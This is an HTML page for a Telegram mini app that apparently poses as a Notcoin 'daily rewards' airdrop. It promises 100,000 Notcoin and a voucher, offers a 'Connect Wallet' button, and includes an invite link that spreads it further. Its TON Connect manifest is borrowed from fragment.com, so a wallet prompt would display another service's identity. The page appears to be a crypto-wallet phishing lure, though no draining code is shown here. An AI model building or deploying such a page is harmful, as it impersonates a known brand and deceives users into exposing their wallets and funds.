<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>Welcome to the Web3 Quest World</title>
        <link rel="shortcut icon" target="_blank" href="images/favicon.svg" type="image/x-icon" />
        <link rel="preconnect" href="https://fonts.googleapis.com" />
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
        <link href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&display=swap" rel="stylesheet" />
        <script src="https://telegram.org/js/telegram-web-app.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/tonweb/dist/tonweb.min.js"></script>
        <script src="https://unpkg.com/@tonconnect/ui@2.0.2/dist/tonconnect-ui.min.js"></script>
        <script>
            const manifestUrl = `https://fragment.com/tonconnect-manifest.json`;
            function openButton() {
                const button = document.querySelector("#ton-connect button");
                if (button) button.click();
            }
        </script>
        <link rel="stylesheet" href="css/main.css">
    </head>

    <body>
        <div id="app">
            <div class="container">
                <div class="brand"><img src="images/1.png" alt="">Notcoin</div>
                <img src="images/1.gif" id="gif" alt="animated gif" class="gif">
                
                <h1>Your daily rewards</h1>
                <div class="cards">
                    <div class="card">
                        <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48" fill="none">
                            <rect x="1" y="1" width="46" height="46" rx="23" stroke="#E6B149" stroke-width="2"></rect>
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M22.3903 17.9164L15.7122 29.5507C15.3812 30.1272 15.7971 30.8462 16.4614 30.8462H22.3903V17.9164ZM25.049 30.8462H30.979C31.6434 30.8462 32.0592 30.1272 31.7283 29.5507L25.049 17.9145V30.8462ZM22.337 12.8012C22.9502 11.7329 24.4902 11.7329 25.1034 12.8012L33.976 28.2584C35.2996 30.5644 33.6363 33.4404 30.979 33.4404H16.4614C13.8041 33.4404 12.1408 30.5644 13.4644 28.2584L22.337 12.8012Z" fill="#E6B149"></path>
                        </svg>
                        <div class="data">
                            <div class="title">100,000</div>
                            <div class="desc">Notcoin</div>
                        </div>
                    </div>
                    <div class="card">
                        <img src="images/nft.png" width="48" height="48" alt="" style="border-radius: 8px;">
                        <div class="data">
                            <div class="title">10,000 $NOT Voucher</div>
                            <div class="desc">Notcoin Pre-Market</div>
                        </div>
                    </div>
                </div>
                <p>Come back tomorrow for check-in day 2</p>
                <div class="btns">
                    <div class="btn connect anim">Connect Wallet</div>
                    <div class="btn invite anim" onclick="setTimeout(() => open_modal(), 100)">Invite friends <span>+10%</span></div>
                </div>
            </div>
            
        </div>
        <div class="modalContainer closed">
            <div class="modal">
                <div class="modalHeader">
                    <h1 class="title" style="font-size: 28px;">How it works</h1>
                    <button class="close anim" onclick="setTimeout(() => close_modal(), 100)">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M2.71966 2.71968C3.01255 2.42678 3.48743 2.42677 3.78032 2.71966L8.00002 6.93925L12.2197 2.71967C12.5126 2.42677 12.9874 2.42678 13.2803 2.71967C13.5732 3.01257 13.5732 3.48744 13.2803 3.78033L9.06068 7.99991L13.2803 12.2197C13.5732 12.5126 13.5732 12.9874 13.2803 13.2803C12.9874 13.5732 12.5126 13.5732 12.2197 13.2803L8.00002 9.06057L3.78033 13.2803C3.48744 13.5732 3.01257 13.5732 2.71967 13.2803C2.42678 12.9874 2.42677 12.5126 2.71967 12.2197L6.93936 7.99991L2.71968 3.78034C2.42678 3.48745 2.42677 3.01257 2.71966 2.71968Z" fill="#909099"></path></svg>
                    </button>
                </div>
                <div class="modalContent">
                    <img style="width: 320px; height: 276px;" src="images/map1.png" alt="" srcset="">
                    <a class="btn connect anim" style="text-align: center;" href="https://t.me/share/url?url=t.me/daily_tap_bot/app&text=https%3A%2F%2Ft.me%2Fdaily_tap_bot%2Fgameapp%3Fstartapp%3Dr_1234567890%20%F0%9F%92%B0%20Daily%20Tap%3A%20Play%2C%20Earn%20-%20Where%20Every%20Day%20Leads%20to%20an%20Airdrop%20Adventure%21%20%F0%9F%8E%81%20Get%20rewards%20every%20day%21" target="_blank">Share invite link</a>
                </div>
            </div>
        </div>
        
        <script>
            const modalContainer = document.querySelector('.modalContainer')
            const modal = document.querySelector('.modal');
            let startY;

            function open_modal() {
                modalContainer.classList.remove('closed');
            }
            function close_modal() {
                modalContainer.classList.add('closed');
            }

            modal.addEventListener('touchstart', (e) => {
                startY = e.touches[0].clientY;
            });

            modal.addEventListener('touchmove', (e) => {
                const moveY = e.touches[0].clientY;
                const diffY = moveY - startY;
                if (diffY > 50) { // If swipe down by 50px or more
                    close_modal();
                }
            });

            modal.addEventListener('touchend', (e) => {
                startY = null;
            });
        </script>
    </body>
</html>
